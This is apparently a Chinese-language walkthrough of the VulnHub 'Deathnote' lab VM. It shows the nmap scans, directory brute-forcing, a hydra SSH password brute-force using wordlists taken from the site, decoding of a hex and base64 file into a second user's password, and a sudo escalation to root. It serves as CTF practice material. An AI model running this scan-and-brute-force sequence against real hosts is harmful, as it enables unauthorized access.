Deathnote

主機發現

本地虛擬機部署，攻擊機kali(IP:172.16.16.101)

sudo nmap -sn -T4 172.16.16.0/24

發現目標機IP(172.16.16.103)

新建文件夾，並進入目錄，用來存儲掃描結果

mkdir -p ~/vulnhub/deathnote/nmap_output

端口掃描

TCP掃描

cd ~/vulnhub/deathnote

sudo nmap --min-rate 10000 -p- 172.16.16.103 -oA nmap_output/ports

詳細信息掃描

sudo nmap -sS -n -Pn -p 22,80,1 -sV -sC -O 172.16.16.103 -oA nmap_output/detail

UDP掃描

sudo nmap -sU --top-ports 100 172.16.16.103 -oA nmap_output/udp

漏洞腳本掃描

sudo nmap --script=vuln -p22,80 172.16.16.103 -oA nmap_output/vuln

信息總結

目標主機172.16.16.103
開放TCP端口22,80端口
22/tcp   ssh	OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   http	Apache httpd 2.4.38 ((Debian))
系統版本
Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)		# OpenWrt是一個開源linux系統，主要用於路由器等嵌入式設備
UDP端口目前無實際利用價值
默認腳本漏洞掃描無可用結果
但是80端口暴露出 /wordpress/	/robots.txt		/wordpress/wp-login.php		/manual/	等文件或目錄

WEB

http://172.16.16.103

訪問後似乎發生了跳轉，且網頁有些異常，啓動burpsuite查看

直接跳轉域名deathnote.vuln

添加本機hosts，將域名deathnote.vuln指向172.16.16.103

sudo echo '172.16.16.103 deathnote.vuln' >> /etc/hosts

或：

sudo sed -i '1i 172.16.16.103 deathnote.vuln' /etc/hosts

重新訪問，跳轉到WordPress正常頁面

目錄掃描

gobuster

gobuster dir -u http://deathnote.vuln/wordpress/ -a "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" -x php,txt,jsp,asp,zip,tar,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

feroxbuster

feroxbuster -u http://deathnote.vuln/ -a "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" -x txt -d 0 -s 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

feroxbuster工具可能不適合這種場景，無法過濾非txt後綴的文件，要麼需要添加正則去篩選，比較麻煩

查看各種已掃描到的網頁，提示去找notes.txt或者去看L的評論

雖然知道notes.txt文件名，但是不知道具體在哪個路徑，所以需要考慮遞歸爆破，還要過濾其他文件

我對比了10款常用的目錄爆破工具，發現目前的場景最適合的工具是ffuf或者dirsearch

具體的10款常用的目錄爆破工具各自的特點和適用場景，請看我另一篇隨筆

https://www.cnblogs.com/syslogd/p/19607360

dirsearch

python dirsearch.py -r -u http://deathnote.vuln

經過幾個小時的等待，發現一些有意思的路徑

http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt

http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/

這個路徑可能有東西

根據上面nmap掃描的ssh端口，可以判定走ssh爆破

先存儲這兩個文件

wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt

結合WEB頁面的信息，推測L和KIRA都可能是用户

SQL注入

/wordpress/wp-login.php

經過幾輪注入，發現注入失敗，可能沒有注入漏洞

ssh爆破

hydra

hydra -t4 -L ~/vulnhub/deathnote/user.txt -P ~/vulnhub/deathnote/notes.txt ssh://172.16.16.103 

login:l   password:death4me

ssh登錄

ssh l@172.16.16.103
death4me

user_flag

一串未知的字符

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.

丟個AI解釋説是Brainfuck語言編寫的程序，輸出結果為：i think u got the shell, but you wont be able to kill me -kira

sudo權限查看

sudo -l
death4me

無權限

用户信息

cat /etc/passwd
ls -al /home

能夠登陸的有：root kira L

翻找文件

/opt/L/fake-notebook-rule

該目錄下有2個文件case.wav hint（"提示"）

查看文件類型

file case.wav hint

都是ASCII字符

查看文件內容

cat case.wav

一串16進制字符

xxd轉換字符

echo |cat case.wav |xxd -r -p

很像base64

base64解碼

echo |cat case.wav |xxd -r -p |base64 -d

可能是kira用户的密碼：kiraisevil

嘗試登錄

ssh kira@172.16.16.103
kiraisevil

成功登錄kira用户

user2_flag

base64轉換

echo |cat kira.txt |base64 -d

/opt/目錄剛才已經查看了，/var/目錄下面有什麼？Misa又是誰？

回看靶機的名字：deathnote，死亡筆記

Misa正是日本漫畫《死亡筆記》女主角，由平野綾配音，被粉絲稱為MisaMisa

進入/var/目錄

查看文件

shadow備份文件沒有讀取權限

提權

sudo提權

查看sudo權限

sudo -l
kiraisevil

(ALL : ALL) ALL 表示可以以root權限執行所有命令

所以直接進行提權到root

sudo su

root_flag